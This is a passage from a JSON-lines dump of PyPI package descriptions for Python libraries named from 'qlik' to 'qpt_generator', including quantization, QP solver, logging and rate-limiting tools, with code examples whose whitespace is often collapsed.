interceptorsauth.rpc.interceptors[\"request\"].use(log_request_interceptor)auth.rpc.interceptors[\"response\"].use(log_qreturn_response_interceptor)session_app_id=\"SessionApp_\"+str(uuid.uuid1())rpc_session=auth.rpc(app_id=session_app_id)withrpc_session.open()asrpc_client:app=rpc_client.send(\"OpenDoc\",-1,session_app_id)handle=app[\"qReturn\"][\"qHandle\"]script=\"Load RecNo() as N autogenerate(200);\"# set load script and reloadrpc_client.send(\"SetScript\",handle,script)rpc_client.send(\"DoReload\",handle)# parameters can be passed without name which will be sent positional in an arraycount_expr=\"COUNT([N])\"positional_eval=rpc_client.send(\"Evaluate\",handle,count_expr)print(f\"Evaluate{count_expr}={positional_eval}\")# parameters can also be passed with name which will be sent as an objectsum_expr=\"SUM([N])\"keyword_eval=rpc_client.send(\"Evaluate\",handle,qExpression=sum_expr)print(f\"Evaluate{sum_expr}={keyword_eval}\")"} +{"package": "qlik_sense", "pacakge-description": "Qlik SenseThis library is a python client for the Qlik Sense APIsOverviewThis library allows users to more easily work with Qlik Sense applications in a larger python workflow. While Qlik's\nAPIs could be used directly, this streamlines the process.Disclaimer:This library, and its maintainer, have no affiliation with QlikTech. Qlik support agreement does not cover\nsupport for this application.RequirementsPython 3.7+requestsrequests_ntlmrequests_negotiate_sspiurllib3uuidmarshmallowInstallationThis package is hosted on PyPI:pipinstallqlik_senseExamplesUse this library to work with Qlik Sense apps:fromqlik_senseimportNTLMClientqs=NTLMClient(host='url/to/qlik/sense/server')app=qs.app.get_by_name_and_stream(app_name='My App',stream_name='My Stream')qs.app.reload(app=app)Full DocumentationFor the full documentation, please visit:https://qlik_sense.readthedocs.io/en/latest/"} +{"package": "qlik-test-aviad", "pacakge-description": "qlik-test-aviadthis amazing project does something!"} +{"package": "qlik-test-dani", "pacakge-description": "qlik-test-dani"} +{"package": "qlik-test-etay", "pacakge-description": "qlik-test-etayprint(hello world)"} +{"package": "qlik-test-moshe", "pacakge-description": "No description available on PyPI."} +{"package": "qlik-test-yuri", "pacakge-description": "qlik-test-yuritest"} +{"package": "qlikutils", "pacakge-description": "No description available on PyPI."} +{"package": "qlink", "pacakge-description": "Entity Resolution and Record Linkage library.Installation$pipinstallqgenerationAlgorithm workflowLicensingThe code in this project is licensed under MIT license."} +{"package": "qlink-interface", "pacakge-description": "QLink-Interface (1.0.0)Welcome to QLink-Interface's README.To install the package do:makeinstallTo verify the installation do:make verifyThis package defines the service interface of the link layer and provides a magic link layer protocol.\nFor details about this interface and specific header fields see the paper:A Link Layer Protocol for Quantum Networkshttps://arxiv.org/abs/1903.09778and the QIRG draft:The Link Layer service in a Quantum Internethttps://datatracker.ietf.org/doc/draft-dahlberg-ll-quantum"} +{"package": "qlinks", "pacakge-description": "qlinks: Quantum link modelDocumentation|Quantum link modelInstallationGetting startedLicense\u00a9 Tan Tao-Lin, 2023. Licensed under\naMITlicense."} +{"package": "qlisp", "pacakge-description": "QLispSimulator for qlispReporting IssuesPlease report all issueson github.LicenseMIT"} +{"package": "qlispc", "pacakge-description": "QLispc"} +{"package": "qlist", "pacakge-description": "open-qlist-pyOpen Source lightweight version of qlistQList EnterpriseEnterprise version available athttps://www.qsonlabs.com"} +{"package": "qlite", "pacakge-description": "QLiteDescriptionQLite is a lite project of SQLite ORM at Python3, as lite ORM for lite SQL.Capabilitycreate/drop tables by its QLite ORM-classes;insert/update/delete data by its QLite ORM-objects;select data by QLite query constuctor;select data with autojoin data by foreign key (different strategies);get QLite ORM-object by ID with all its recursion data or one-step data with lazy=TRUE;LinksGitHub -https://github.com/BorisPlus/otus_webpython_005AuthorBorisPlusCommentHomework project \u0430t course \u201cWeb-developer by Python\u201d (https://otus.ru/learning)"} +{"package": "qlivi", "pacakge-description": "No description available on PyPI."} +{"package": "qlkit", "pacakge-description": "No description available on PyPI."} +{"package": "qlknn", "pacakge-description": "QLKNNA collection of tools to create QuaLiKiz Neural Networks.Read theGitLab Pagesandwikifor more information."} +{"package": "qlknnfort", "pacakge-description": "Please refer to thewikifor more usage-type documentation. Detailed information about all methods and types defined in QLKNN-fortran can be found on theGitLab Pages"} +{"package": "qlk-test-liat", "pacakge-description": "qlk-test-LiatPrint(\"Test\")"} +{"package": "qllauncher", "pacakge-description": "UNKNOWN"} +{"package": "qlligraphy", "pacakge-description": "Qlligraphy. GraphQL Schema -> Pydantic modelsQlligraphy is a simple CLI tool, that generates pydantic models based on graphQL schema.InstallationpipinstallqlligraphyUsage:Consider the following schema written inexample.gqlenumEpisode{NEWHOPEEMPIREJEDI}typeCharacter{name:String!appearsIn:[Episode]!}Running:qlligraphyexample.gql-oexample.pyResults in the following python file:fromenumimportEnumfromtypingimportList,OptionalfrompydanticimportBaseModelclassEpisode(str,Enum):NEWHOPE=\"NEWHOPE\"EMPIRE=\"EMPIRE\"JEDI=\"JEDI\"classCharacter(BaseModel):name:strappearsIn:List[Optional[Episode]]Please note: This package is still in WIP state."} +{"package": "qllm", "pacakge-description": "QLLMSupports any LLMs in HuggingFace/Transformers, mixed bits(2-8bit), GPTQ/AWQ/HQQ, ONNX exportQLLM is a out-of-box quantization toolbox for large language models, It didn't limit to a specific model, and designed to be auto-quantization layer by layer for any LLMs. It can also be used to export quantized model to onnx with only one args `--export_onnx ./onnx_model`, and inference with onnxruntime.\nBesides, model quantized by different quantization method (GPTQ/AWQ/HQQ) can be loaded from huggingface/transformers and transfor to each other without extra effort.We alread supportedGPTQ quantizationAWQ quantizationHQQ quantizationFeatures:GPTQ supports all LLM models in huggingface/transformers, it will automatically detect the model type and quantize it.We support to quantize model by 2-8 bits, and support to quantize model with different quantization bits for different layers.Auto promoting bits/group-size for better accuracyLatest News\ud83d\udd25[2024/01] SupportHQQalgorithm[2023/12] The first PyPi package releasedInstallationEasy to install qllm from PyPi [cu121]pip install qllmInstall from release package, CUDA-118/121 is supported.\n[py38, py39, py310]https://github.com/wejoncy/QLLM/releasesBuild from SourcePlease set ENV EXCLUDE_EXTENTION_FOR_FAST_BUILD=1 for fast buildIf you are using CUDA-121pip install git+https://github.com/wejoncy/QLLM.gitOR CUDA-118/117git clone https://github.com/wejoncy/QLLM.git\ncd QLLM\npython setup.py installHow to use itQuantize llama2# Quantize and Save compressed model, method can be one of [gptq/awq/hqq]python-mqllm--model=meta-llama/Llama-2-7b-hf--method=gptq--nsamples=64--wbits=4--groupsize=128--save./Llama-2-7b-4bit(NEW) Quantize model with mix bits/groupsize for higher precision (PPL)# Quantize and Save compressed modelpython-mqllm--model=meta-llama/Llama-2-7b-hf--method=gptq--save./Llama-2-7b-4bit--allow_mix_bits--true-sequentialNOTE:only support GPTQallow_mix_bits option refered from gptq-for-llama, QLLM makes it easier to use and flexiblewjat different with gptq-for-llama is we grow bit by one instead of times 2.all configurations will be saved/load automaticlly instead of quant-table which used by gptq-for-llama.if --allow_mix_bits is enabled, The saved model is not compatible with vLLM for now.Quantize model for vLLMDue to the zereos diff, we need to set a env variable if you set pack_mode to GPTQ whenver the method is awq or gptqCOMPATIBLE_WITH_AUTOGPTQ=1python-mqllm--model=meta-llama/Llama-2-7b-hf--method=gptq--save./Llama-2-7b-4bit--pack_mode=GPTQIf you use GEMM pack_mode, then you don't have to set the varpython-mqllm--model=meta-llama/Llama-2-7b-hf--method=gptq--save./Llama-2-7b-4bit--pack_mode=GEMMpython-mqllm--model=meta-llama/Llama-2-7b-hf--method=awq--save./Llama-2-7b-4bit--pack_mode=GEMMConversion between AWQ and GPTQpython-mqllm--loadTheBloke/Llama-2-7B-Chat-AWQ--eval--save./Llama-2-7b-chat-hf_gptq_q4/--pack_mode=GPTQOr you can use--pack_mode=AWQto convert GPTQ to AWQ.python-mqllm--loadTheBloke/Llama-2-7B-Chat-GPTQ--eval--save./Llama-2-7b-chat-hf_awq_q4/--pack_mode=GEMMNote:Not all cases are supported, for example,if you quantized model with different quantization bits for different layers, you can't convert it to AWQ.if GPTQ model is quantized with--allow_mix_bitsoption, you can't convert it to AWQ.if GPTQ model is quantized with--act_orderoption, you can't convert it to AWQ.Convert to onnx modeluse--export_onnx ./onnx_modelto export and save onnx modelpython -m qllm --model meta-llama/Llama-2-7b-chat-hf --method=gptq --dataset=pileval --nsamples=16 --save ./Llama-2-7b-chat-hf_awq_q4/ --export_onnx ./Llama-2-7b-chat-hf_awq_q4_onnx/model inference with the saved modelpython-mqllm--load./Llama-2-7b-4bit--evalmodel inference with ORTyou may want to usegenaito do generation with ORT.importonnxruntimefromtransformersimportAutoTokenizeronnx_path_str='./Llama-2-7b-4bit-onnx'tokenizer=AutoTokenizer.from_pretrained(onnx_path_str,use_fast=True)sample_inputs=tokenizer(\"Hello, my dog is cute\",return_tensors=\"pt\")onnx_model_path=onnx_path_str+'/decoder_merged.onnx'session=onnxruntime.InferenceSession(onnx_model_path,providers=['CUDAExecutionProvider'])mask=np.ones(sample_inputs[0].shape,dtype=np.int64)ifsample_inputs[1]isNoneelsesample_inputs[1].cpu().numpy()num_layers=model.config.num_hidden_layersinputs={'input_ids':sample_inputs[0].cpu().numpy(),'attention_mask':mask,'position_ids':np.arrange(0,sample_inputs[0],dtype=np.int64),'use_cache_branch':np.array([0],dtype=np.bool_)}foriinrange(num_layers):inputs[f'past_key_values.{i}.key']=np.zeros((1,32,32,128),dtype=np.float16)inputs[f'past_key_values.{i}.value']=np.zeros((1,32,32,128),dtype=np.float16)outputs=session(None,inputs)Load quantized model from hugingface/transformerspython-mqllm--loadTheBloke/Llama-2-7B-Chat-AWQ--eval\npython-mqllm--loadTheBloke/Llama-2-7B-Chat-GPTQ--eval\npython-mqllm--loadTheBloke/Mixtral-8x7B-v0.1-GPTQ--use_pluginstart a chatbotyou may need to install fschat and accelerate with pippipinstallfschataccelerateuse--use_pluginto enable a chatbot pluginpython -m qllm --model meta-llama/Llama-2-7b-chat-hf --method=awq --dataset=pileval --nsamples=16 --use_plugin --save ./Llama-2-7b-chat-hf_awq_q4/\n\nor \npython -m qllm --model meta-llama/Llama-2-7b-chat-hf --method=gptq --dataset=pileval --nsamples=16 --use_plugin --save ./Llama-2-7b-chat-hf_gptq_q4/For some users has transformers connect issues.Please set environment with PROXY_PORT=your http proxy portPowerShell$env:PROXY_PORT=1080Bashexport PROXY_PORT=1080windows cmdset PROXY_PORT=1080AcknowledgementsGPTQGPTQ-tritonAutoGPTQllm-awqAutoAWQ.HQQ"} +{"package": "qlm", "pacakge-description": "A command line app for taking beautiful notes.qlmgives you access to beautiful notes on any machine.The name comes from the Arabic word for pen:\u0642\u0644\u0645which makes use of the three letter rootq-l-mto cut, snip, prune, clip or truncate. So\ntry to keep those notes concise ;-)Basic Usagepip install qlm\nqlm connect 'username/repo'\necho '# My notes' > my_note.md\nqlm add my_note.md\nqlm show my_note.md"} +{"package": "qlmaas", "pacakge-description": "Module qlmaasThis moduleqlmaasis the client ofQaptiva Access(a.k.a.QLM as a Service). This module is part ofmyQLMand is used to submit\nQuantum jobs to a Qaptiva appliance.PrerequisitesThis version of myQLM works on both Windows, macOS and Linux for different versions of Python 3. Please look at thecompatibility matrixto ensure myQLM is installable on your computer.This module can be installed by typing the following command:pip install myqlmLicensemyQLM EULA"} +{"package": "qlmetrics", "pacakge-description": "qlmetricsPython metric tracking"} +{"package": "qload", "pacakge-description": "qload : better assertion on filesqload is a library to load or extract content of a file to perform assertion in automatic tests without\nboilerplate. It support file from filesystem, ftp, s3, ...Benefitsoneliner to assert on the content of a fileuseful differential when the test fails thanks to subpart extractionsupport for the most common formats (yaml, csv, json, txt)support for multiple file systems and protocols (local, ftp, s3)rich expression engine to extract part of a file (regexpfortextandjmespathforcsv,jsonandyamlto improve differential)Gettings startedpipinstallqloadUsageimportqloadassert'database_url: postgresql://127.0.0.1:5432/postgres'inqload.text('file.txt')assertqload.text('file.txt',expression='Hello .*')=='Hello Fabien'assertqload.json('file.json')=={}assertqload.json('s3://mybucket/file1.json')=={}assertqload.json('file.json',expression='$.id')==''assertlen(qload.json('file.json',expression='$.id'))==4assertqload.yaml('file.yml')=={}assertqload.yaml('file.yml',expression='$.id')==''assertqload.csv('file.csv',expression='[*].Account')==['ALK','BTL','CKL']assertqload.csv('file.csv',expression='[*].Account')[0]=='ALK'assertqload.parquet('file.parquet',expression='[*].Account')[0]=='ALK'assertqload.ftp(host='localhost',port=21,login='admin',password='admin').csv(path='dir/file.csv',expression='')==[]assertqload.s3(bucket='bucket',aws_access_key_id='',aws_secret_access_key='',region_name='eu-west-1',endpoint_url='http://localhost:9090').json(path='dir/file.csv')=={}assertqload.isfile('file.json')isTrueassertqload.s3(bucket='bucket').isfile('file.json')isTrue"} +{"package": "qloader", "pacakge-description": "No description available on PyPI."} +{"package": "qlogging", "pacakge-description": "Python Quick Logging | QLoggingBeautifully colored, quick and simple Python logging. This logger is based onPython logging packageScreenshots:Terminal/CMDNotebooks:Windows:FeaturesColor logging in Terminal and CMDColor logging in Jupyter Notebook and Jupyter LabColor logging in Kaggle NotebookColor logging in Google Colab NotebookKnow which function the logger was called fromKnow while line number the logger was called fromSupport logging to a fileSimple and clean one-linerCustomizableInstallation$ pip install qloggingExamplesLogging only to console/notebook:import qlogging\nlogger = qlogging.get_logger(level='debug')\n\nlogger.debug(\"This is debug\") \nlogger.info(\"This is info\")\nlogger.warning(\"This is warning\")\nlogger.error(\"This is an error\")\nlogger.critical(\"This is a critical\")Output (output format:List of Controllers* [APIController](#api_controller)## ![Class: ](https://apidocs.io/img/class.png \".APIController\") APIController### Get controller instanceAn instance of the ``` APIController ``` class can be accessed from the API Client.```pythonclient_controller = client.client```### ![Method: ](https://apidocs.io/img/method.png \".APIController.get_basic_auth_test\") get_basic_auth_test> TODO: Add a method description```pythondef get_basic_auth_test(self)```#### Example Usage```pythonresult = client_controller.get_basic_auth_test()```[Back to List of Controllers](#list_of_controllers)"} +{"package": "qpsh", "pacakge-description": "No description available on PyPI."} +{"package": "qps-limit", "pacakge-description": "QPS LimitRun functions under any limited rate usingmultiprocessing+asyncioAvailable on Unix (i.e. Linux, MacOS) only, as the default multiprocessing start method isforkInstallationpipinstallqps-limitor install manually via gitgitclonegit://github.com/antct/qps-limit.gitqps-limitcdqps-limit\npythonsetup.pyinstallUsagefromqps_limitimportLimiterLimiter(func=\"an asynchronous function\",params=\"a generator function yields args and kwargs\",callback=\"a callback function that handles the return values of func\",num_workers=\"number of processes, recommended <= number of CPUs\",worker_max_qps=\"maximum qps per process, None means unlimited\",ordered=\"return ordered results or not, the default option is False\")BTW: The wrapped function returns tuples(idx, res)consisting of the data index and the function return value. Ifordered=Falseis set, the order of the returned values may be randomized for better performance.Quick Start10 workers, each with a maximum qps of 10, to sample data from input stream (i.e. reservoir sampling)importrandomfromqps_limitimportLimiterasyncdeffunc(n:int):returnndefparams():forninrange(1000):yield(),{\"n\":n}f=Limiter(func=func,params=params,num_workers=10,worker_max_qps=10,ordered=False)i=0k=10d=[]for_,resinf():ifimax_i:f.stop()breaki+=1Safely write files with multiple processesimportfcntlwriter=open('...','w+')defcallback(line):globalwriterfcntl.flock(writer,fcntl.LOCK_EX)writer.write('{}\\n'.format(line))writer.flush()fcntl.flock(writer,fcntl.LOCK_UN)f=Limiter(...callback=callback)"} +{"package": "qpso", "pacakge-description": "qpsoA Python implementation of quantum particle swarm optimization (QPSO).pip install qpsoThis is a black-box optimization package built upon the quantum paricle swarm\noptimization [1].QuickstartThe usage of this package is very simple.\nFor example, the following code shows how to solve a 10-dimensional opmitzation\nproblem by using QPSO with Delta potential well (QDPSO) proposed in [1].importnumpyasnpfromqpsoimportQDPSOdefsphere(args):f=sum([np.power(x,2.)forxinargs])returnfdeflog(s):best_value=[p.best_valueforpins.particles()]best_value_avg=np.mean(best_value)best_value_std=np.std(best_value)print(\"{0: >5}{1: >9}{2: >9}{3: >9}\".format(\"Iters.\",\"Best\",\"Best(Mean)\",\"Best(STD)\"))print(\"{0: >5}{1: >9.3E}{2: >9.3E}{3: >9.3E}\".format(s.iters,s.gbest_value,best_value_avg,best_value_std))NParticle=40MaxIters=1000NDim=10bounds=[(-2.56,5.12)foriinrange(0,NDim)]g=0.96s=QDPSO(sphere,NParticle,NDim,bounds,MaxIters,g)s.update(callback=log,interval=100)print(\"Found best position:{0}\".format(s.gbest))Bibliography[1] Jun Sun, Bin Feng and Wenbo Xu, \"Particle swarm optimization with particles having quantum behavior,\" Proceedings of the 2004 Congress on Evolutionary Computation (IEEE Cat. No.04TH8753), Portland, OR, USA, 2004, pp. 325-331 Vol.1.\ndoi: 10.1109/CEC.2004.1330875"} +{"package": "qpsolvers", "pacakge-description": "Quadratic Programming Solvers in PythonThis library provides a one-stop shopsolve_qpfunction to solve convex quadratic programs:$$\n\\begin{split}\n\\begin{array}{ll}\n\\underset{x}{\\mbox{minimize}}\n& \\frac{1}{2} x^T P x + q^T x \\\n\\mbox{subject to}\n& G x \\leq h \\\n& A x = b \\\n& lb \\leq x \\leq ub\n\\end{array}\n\\end{split}\n$$Vector inequalities apply coordinate by coordinate. The function returns the primal solution $x^*$ found by the backend QP solver, orNonein case of failure/unfeasible problem. All solvers require the problem to be convex, meaning the matrix $P$ should bepositive semi-definite. Some solvers further require the problem to be strictly convex, meaning $P$ should be positive definite.Dual multipliers:there is also asolve_problemfunction that returns not only the primal solution, but also its dual multipliers and all other relevant quantities computed by the backend solver.ExampleTo solve a quadratic program, build the matrices that define it and callsolve_qp, selecting the backend QP solver via thesolverkeyword argument:importnumpyasnpfromqpsolversimportsolve_qpM=np.array([[1.0,2.0,0.0],[-8.0,3.0,2.0],[0.0,1.0,1.0]])P=M.T@M# this is a positive definite matrixq=np.array([3.0,2.0,3.0])@MG=np.array([[1.0,2.0,1.0],[2.0,0.0,1.0],[-1.0,2.0,-1.0]])h=np.array([3.0,2.0,-2.0])A=np.array([1.0,1.0,1.0])b=np.array([1.0])x=solve_qp(P,q,G,h,A,b,solver=\"proxqp\")print(f\"QP solution:{x= }\")This example outputs the solution[0.30769231, -0.69230769, 1.38461538]. It is also possible to get dual multipliers at the solution, as shown inthis example.InstallationPyPITo install the library with open source QP solvers:pip install qpsolvers[open_source_solvers]To install selected QP solvers, list them between brackets:pip install qpsolvers[clarabel,daqp,proxqp,scs]And to install only the library itself:pip install qpsolvers.When imported, qpsolvers loads all the solvers it can find and lists them inqpsolvers.available_solvers.Condaconda install -c conda-forge qpsolversSolversSolverKeywordAlgorithmAPILicenseWarm-startClarabelclarabelInterior pointSparseApache-2.0\u2716\ufe0fCVXOPTcvxoptInterior pointDenseGPL-3.0\u2714\ufe0fDAQPdaqpActive setDenseMIT\u2716\ufe0fECOSecosInterior pointSparseGPL-3.0\u2716\ufe0fGurobigurobiInterior pointSparseCommercial\u2716\ufe0fHiGHShighsActive setSparseMIT\u2716\ufe0fHPIPMhpipmInterior pointDenseBSD-2-Clause\u2714\ufe0fMOSEKmosekInterior pointSparseCommercial\u2714\ufe0fNPPronpproActive setDenseCommercial\u2714\ufe0fOSQPosqpAugmented LagrangianSparseApache-2.0\u2714\ufe0fPIQPpiqpProximal Interior PointDense & SparseBSD-2-Clause\u2716\ufe0fProxQPproxqpAugmented LagrangianDense & SparseBSD-2-Clause\u2714\ufe0fQPALMqpalmAugmented LagrangianSparseLGPL-3.0\u2714\ufe0fqpOASESqpoasesActive setDenseLGPL-2.1\u2796qpSWIFTqpswiftInterior pointSparseGPL-3.0\u2716\ufe0fquadprogquadprogActive setDenseGPL-2.0\u2716\ufe0fSCSscsAugmented LagrangianSparseMIT\u2714\ufe0fMatrix arguments are NumPy arrays for dense solvers and SciPy Compressed Sparse Column (CSC) matrices for sparse ones.Frequently Asked QuestionsCan I print the list of solvers available on my machine?Is it possible to solve a least squares rather than a quadratic program?I have a squared norm in my cost function, how can I apply a QP solver to my problem?I have a non-convex quadratic program, is there a solver I can use?I have quadratic equality constraints, is there a solver I can use?Error: Mircrosoft Visual C++ 14.0 or greater is required on WindowsCan I add penalty terms as in ridge regression or LASSO?BenchmarkThe results below come fromqpbenchmark, a benchmark for QP solvers in Python. In the following tables, solvers are called with their default settings and compared over whole test sets byshifted geometric mean(\"shm\" for short). Lower is better and 1.0 corresponds to the best solver.Maros-Meszaros (hard problems)Check out thefull reportfor high- and low-accuracy solver settings.Success rate (%)Runtime (shm)Primal residual (shm)Dual residual (shm)Duality gap (shm)Cost error (shm)clarabel89.91.01.01.91.01.0cvxopt53.613.85.32.622.96.6gurobi16.757.810.537.594.034.9highs53.611.35.32.621.26.1osqp41.31.858.722.61950.742.4proxqp77.54.62.01.011.52.2scs60.12.137.53.4133.18.4Maros-Meszaros dense (subset of dense problems)Check out thefull reportfor high- and low-accuracy solver settings.Success rate (%)Runtime (shm)Primal residual (shm)Dual residual (shm)Duality gap (shm)Cost error (shm)clarabel100.01.01.078.41.01.0cvxopt66.11267.4292269757.0268292.6269.172.5daqp50.04163.41056090169.5491187.7351.8280.0ecos12.927499.0996322577.2938191.8197.61493.3gurobi37.13511.4497416073.413585671.64964.0190.6highs64.51008.4255341695.6235041.8396.254.5osqp51.6371.75481100037.53631889.324185.1618.4proxqp91.914.11184.31.071.87.2qpoases24.23916.08020840724.223288184.8102.2778.7qpswift25.816109.1860033995.1789471.9170.4875.0quadprog62.91430.6315885538.24734021.72200.0192.3scs72.695.62817718628.1369300.93303.2152.5Citing qpsolversIf you find this project useful, please consider giving it a :star: or citing it if your work is scientific:@software{qpsolvers2024,author={Caron, St\u00e9phane and Arnstr\u00f6m, Daniel and Bonagiri, Suraj and Dechaume, Antoine and Flowers, Nikolai and Heins, Adam and Ishikawa, Takuma and Kenefake, Dustin and Mazzamuto, Giacomo and Meoli, Donato and O'Donoghue, Brendan and Oppenheimer, Adam A. and Pandala, Abhishek and Quiroz Oma\u00f1a, Juan Jos\u00e9 and Rontsis, Nikitas and Shah, Paarth and St-Jean, Samuel and Vitucci, Nicola and Wolfers, Soeren and @bdelhaisse and @MeindertHH and @rimaddo and @urob and @shaoanlu},license={LGPL-3.0},month=feb,title={{qpsolvers: Quadratic Programming Solvers in Python}},url={https://github.com/qpsolvers/qpsolvers},version={4.3.1},year={2024}}ContributingWe welcome contributions! The first step is to install the library and use it. Report any bug in theissue tracker. If you're a developer looking to hack on open source, check out thecontribution guidelinesfor suggestions.We are also looking forward to hearing about your use cases! Please share them inShow and tell\ud83d\ude4c"} +{"package": "qpsolversbench", "pacakge-description": "qpsolversbenchMinor utilities for examining quadratic solvers on problems from the precise package."} +{"package": "qpsolvers_benchmark", "pacakge-description": "QP solvers benchmarkBenchmark for quadratic programming (QP) solvers available in Python.The goal of this benchmark is to help users compare and select QP solvers. Its methodology is open todiscussions. The benchmark ships standard and communitytest sets, as well as aqpsolvers_benchmarkcommand-line tool to run test sets directly. The main output of the benchmark are standardized reports evaluating allmetricsacross all QP solvers available on the test machine. This repository also distributesresultsfrom running the benchmark on a reference computer.New test sets are welcome! The benchmark is designed so that each test-set comes in a standalone directory. Feel free to create a new one andcontribute ithere so that we grow the collection over time.Test setsThe benchmark comes with standard and community test sets to represent different use cases for QP solvers:Test setProblemsBrief descriptionMaros-Meszaros138Standard, designed to be difficult.Maros-Meszaros dense62Subset of Maros-Meszaros restricted to smaller dense problems.GitHub free-for-all12Community-built, new problemsare welcome!SolversSolverKeywordAlgorithmMatricesLicenseClarabelclarabelInterior pointSparseApache-2.0CVXOPTcvxoptInterior pointDenseGPL-3.0DAQPdaqpActive setDenseMITECOSecosInterior pointSparseGPL-3.0GurobigurobiInterior pointSparseCommercialHiGHShighsActive setSparseMITHPIPMhpipmInterior pointDenseBSD-2-ClauseMOSEKmosekInterior pointSparseCommercialNPPronpproActive setDenseCommercialOSQPosqpDouglas\u2013RachfordSparseApache-2.0PIQPpiqpProximal Interior PointDense & SparseBSD-2-ClauseProxQPproxqpAugmented LagrangianDense & SparseBSD-2-ClauseqpOASESqpoasesActive setDenseLGPL-2.1qpSWIFTqpswiftInterior pointSparseGPL-3.0quadprogquadprogGoldfarb-IdnaniDenseGPL-2.0SCSscsDouglas\u2013RachfordSparseMITMetricsWe evaluate QP solvers based on the following metrics:Success rate:percentage of problems a solver is able to solve on a given test set.Computation time:time a solver takes to solve a given problem.Optimality conditions:we evaluate all threeoptimality conditions:Primal residual:maximum error on equality and inequality constraints at the returned solution.Dual residual:maximum error on the dual feasibility condition at the returned solution.Duality gap:value of the duality gap at the returned solution.Cost error:difference between the solution cost and the known optimal cost.Shifted geometric meanEach metric (computation time, primal and dual residuals, duality gap) produces a different ranking of solvers for each problem. To aggregate those rankings into a single metric over the whole test set, we use theshifted geometric mean(shm), which is a standard to aggregate computation times inbenchmarks for optimization software. This mean has the advantage of being compromised by neither large outliers (as opposed to the arithmetic mean) nor by small outliers (in contrast to the geometric geometric mean). Check out thereferencesbelow for further details.Here are some intuitive interpretations:A solver with a shifted-geometric-mean runtime of $Y$ is $Y$ times slower than the best solver over the test set.A solver with a shifted-geometric-mean primal residual $R$ is $R$ times less accurate on equality and inequality constraints than the best solver over the test set.ResultsThe outcome from running a test set is a standardized report comparingsolversagainst the differentmetrics. Here are the results obtained on a reference computer:Test setResultsCPU infoGitHub free-for-allFull reportIntel(R) Core(TM) i7-6500U CPU @ 2.50GHzMaros-MeszarosFull reportIntel(R) Core(TM) i7-6500U CPU @ 2.50GHzMaros-Meszaros denseFull reportIntel(R) Core(TM) i7-6500U CPU @ 2.50GHzYou can check out results from a variety of machines, and share the reports produced by running the benchmark on your own machine, in theResults categoryof the discussions forum.LimitationsHere are some known areas of improvement for this benchmark:Cold start only:we don't evaluate warm-start performance for now.CPU thermal throttling:the benchmark currently does not check the status of CPU thermal throttling. Adding this feature is agood way to start contributingto the benchmark.Check out theissue trackerfor ongoing works and future improvements.InstallationYou can install the benchmark and its dependencies in an isolated environment usingconda:conda env create -f environment.yamlconda activate qpsolvers_benchmarkAlternatively, you can install the benchmark on your system usingpip:pip install qpsolvers_benchmarkBy default, the benchmark will run all supported solvers it finds.Running the benchmarkOnce the benchmark is installed, you will be able to run theqpsolvers_benchmarkcommand. Provide it with the script corresponding to thetest setyou want to run, followed by a benchmark command such as \"run\". For instance, let's run the \"dense\" subset of the Maros-Meszaros test set:qpsolvers_benchmark maros_meszaros/maros_meszaros_dense.py runYou can also run a specific solver, problem or set of solver settings:qpsolvers_benchmark maros_meszaros/maros_meszaros_dense.py run --solver proxqp --settings defaultCheck outqpsolvers_benchmark --helpfor a list of available commands and arguments.PlotsThe command line ships aplotcommand to compare solver performances over a test set for a specific metric. For instance, run:qpsolvers_benchmark maros_meszaros/maros_meszaros_dense.py plot runtime high_accuracyTo generate the following plot:ContributingContributions to improving this benchmark are welcome. You can for instance propose new problems, or share the runtimes you obtain on your machine. Check out thecontribution guidelinesfor details.CitationTo cite this benchmark in your scientific works, follow theCite this repositorybutton on GitHub (top-right of therepository page).See alsoReferencesHow not to lie with statistics: the correct way to summarize benchmark results: why geometric means should always be used to summarize normalized results.Optimality conditions and numerical tolerances in QP solvers: note written while figuring out thehigh_accuracysettings of this benchmark.Other benchmarksBenchmarks for optimization softwareby Hans Mittelmann, which includes reports on the Maros-Meszaros test set.jrl-qp/benchmarks: benchmark of QP solvers available in C++.osqp_benchmark: benchmark examples for the OSQP solver.proxqp_benchmark: benchmark examples for the ProxQP solver."} +{"package": "qpsphere", "pacakge-description": "qpsphereis a Python3 library for analyzing spherical objects in\nquantitative phase imaging.DocumentationThe documentation, including the reference and examples, is available atqpsphere.readthedocs.io.Installationpip install qpsphereTestingpip install -e .\npip install pytest\npytest testsReleases to PyPIThe wheel distribution of qpsphere includes binaries of the BHFIELD program\nand are thus platform-specific. When creating the wheels, theplat-namecommand line argument must be set.# on Windows\npython setup.py sdist bdist_wheel --plat-name win_amd64\n# on Linux\npython setup.py sdist bdist_wheel --plat-name manylinux1_x86_64"} +{"package": "qpt-generator", "pacakge-description": "qpt_generatorAn implementation of Question Paper Template Generation Algorithm written in C++ to provide high performance. It uses Cython internally to create python package.IntroductionGeneration of question papers through a question bank is an important activity in learning management systems and educational institutions. The quality of question paper is based on various design constraints such as whether a question paper assesses different problem solving skills as per Bloom's taxonomy, whether it covers all units from the syllabus of a course and whether it covers various difficulty levels.I have implemented algorithm written by Vaibhav M. Kale and Arvind W. Kiwelekar for question paper template generation in C++ to provide fast performance. Implementation is extensible in terms of constriant it support to create question paper template.The qpt_generator package was motivated by the needs of my academic projectQuestion Paper Generator.InstallationYou can install qpt_generator using easy_install with following command:pip install qpt-generatororeasy_install qpt-generatorUsageAfter installing module, you can import it using following command:fromqpt_generatorimportQPTGeneratorYou have to provide two inputs to the constructor of QPTGenerator:A dictionary of constraints and lists of distribution of markEx: if you want to generate paper with 4 constraint:Unit-wise distribution of marksDifficulty level-wise distribution of marksCognitive level-wise distribution of marksQuestion-wise distribution of marksA list of question no. associated with list of question-wise mark distributions. Repitition of same question no. indicates subquestions of that question.Output will be generated when you call generate method of the QPTGenerator class. Here, output is a dictionary of list of the alloted unit, cognitive level, difficulty and mark by question no.fromqpt_generatorimportQPTGeneratormark_distributions={\"question\":[5,5,10,4,6,5,5],\"unit\":[8,8,8,5,11],\"difficulty\":[13,15,12],\"cognitive\":[12,18,10],}question_no=[1,1,2,3,3,4,4]qpt=QPTGenerator(mark_distributions,question_no)output=qpt.generate()# output = {'cognitive': [2, 3, 2, 3, 3, 1, 3, 1, 1, 2],# 'difficulty': [3, 1, 2, 2, 1, 3, 3, 1, 2, 3],# 'question': [5, 5, 8, 2, 2, 1, 1, 6, 5, 5],# 'question_no': [1, 1, 2, 2, 3, 3, 3, 3, 4, 4],# 'unit': [4, 5, 1, 3, 2, 2, 3, 5, 2, 3]}To satisfy all given constraints:\nquestion 1 should have 2 subquestions:first question should have cognitive_level = 2, difficulty = 3, unit no.= 4 and mark = 5second question should have cognitive_level = 3, difficulty = 